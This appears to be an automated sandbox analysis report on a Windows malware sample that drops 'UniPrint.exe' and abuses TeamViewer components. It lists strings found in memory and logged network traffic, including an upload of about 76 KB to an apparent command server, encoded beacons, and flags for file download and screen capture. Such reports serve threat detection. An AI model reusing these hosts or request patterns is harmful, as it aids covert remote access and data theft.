Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.533082315.00000000028DE000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.317241636.000001BF6064E000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316700720.000001BF60664000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.317142598.000001BF60613000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316800598.000001BF60645000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316785328.000001BF60640000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000B.00000002.317241636.000001BF6064E000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.460571183.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/-resource://Microsoft.Microsoft3DViewer4
Source: UniPrint.exe, 00000004.00000003.412925406.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/0p
Source: UniPrint.exe, 00000004.00000003.478775345.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/0pp
Source: UniPrint.exe, 00000004.00000003.325324514.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/1
Source: UniPrint.exe, 00000004.00000003.303052348.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/2i
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/3DViewer_2.1803.8022.0_x64_
Source: UniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/64__8wekyb3d8bbwe?ms-resource://Microso
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/8C631A8/
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/8C631A8/.Microsoft3DViewer4
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/8C631A8/9
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/8C631A8/al_cw5n1h2txyewy?m0
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/8C631A8/e
Source: UniPrint.exe, 00000004.00000002.545681944.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/8C631A8/esources/StoreAppN
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/8C631A8/ources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/8C631A8/resource://Microso
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/9
Source: UniPrint.exe, 00000004.00000003.489357888.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/=
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.441746843.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.438725277.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/
Source: UniPrint.exe, 00000004.00000003.489357888.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/.Microsoft3DViewer4
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/2.1803.8022.0_x64_
Source: UniPrint.exe, 00000004.00000003.308537365.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/8
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/9
Source: UniPrint.exe, 00000004.00000003.418618637.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/B
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/E
Source: UniPrint.exe, 00000004.00000003.471440438.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/L
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/R
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/ackageDisplayName
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/al_cw5n1h2txyewy?m0
Source: UniPrint.exe, 00000004.00000003.379200176.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/d.info/B8C631A8/
Source: UniPrint.exe, 00000004.00000003.451977098.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/e
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/esources/StoreAppN
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/leUI/resources/Pkg
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/lopmentPropertiesh
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/lopmentPropertiesl
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/ources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/pName
Source: UniPrint.exe, 00000004.00000003.332650410.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/resource://Microso
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/soft.Microsoft3DVi
Source: UniPrint.exe, 00000004.00000003.348911861.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/t
Source: UniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/wer_2.1803.8022.0_l
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/Q
Source: UniPrint.exe, 00000004.00000003.441746843.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/Wp
Source: UniPrint.exe, 00000004.00000003.451977098.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/a
Source: UniPrint.exe, 00000004.00000003.415242974.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/ameCallableUI/resources/Pkg
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.466393951.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/
Source: UniPrint.exe, 00000004.00000003.446837962.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/3DViewer_2.1803.8022.0_x64_
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/8C631A8/
Source: UniPrint.exe, 00000004.00000003.489357888.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/8C631A8/9
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/8C631A8/resource://Microso
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.424436468.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/9
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/leUI/resources/Pkg
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/lopmentPropertiesh
Source: UniPrint.exe, 00000004.00000003.415242974.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/ources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/soft.Microsoft3DVi
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/ameCallableUI/resources/Pkg
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/ervice
Source: UniPrint.exe, 00000004.00000003.451977098.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/s/StoreAppName
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/tral_neutral_cw5n1h2txyewy?
Source: UniPrint.exe, 00000004.00000003.323291752.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/vider/Resources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/ervice
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/ft.Microsoft3DViewer_2.1803.8022.0_x64_
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/i
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/iew.UWP/Resources/StoreAppN
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/s/StoreAppName
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/tral_neutral_cw5n1h2txyewy?
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/vider/Resources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.303052348.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/xIdentityProvider/Resources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/~
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmp String found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: unknown HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76431Content-Type: multipart/form-data; boundary=--------3259937207User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70985DF0 InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,WriteFile,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_70985DF0
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6sTY0saWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAABSAAApKaCYgAIAAAiAAABb76jy6JCEtP10hWwK5JgAShY7zj+R7R3DOU3+0YZJRajqI5wj4APqnpqJTTfow2rFHUX7lb5rKPxXbMNzymnW3afsLjONOJOSFwYGgTrjCxDXlTyXTROrLUrNxoJ5e0wRdRUaIY3bkkZHP/DCc/GC84acwVg91URMKSdn0IIfWg== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082859&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082864&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJbKyuDC2NLsynpiTJjC3M7qws7KetTCTJjSxsrc5sqo8uDKemBMmpKIemDwysbMaMTEYszGanBsvmJucGBqbmBkbG5MnN6ezILG6NLsypbKyuDC2NLsynpgTKTq3OjS2sp6ckym6uDg3uToysiMysLo6uTK5npiTKiGoJ6qqHpgTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.3:49752 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to record screenshots
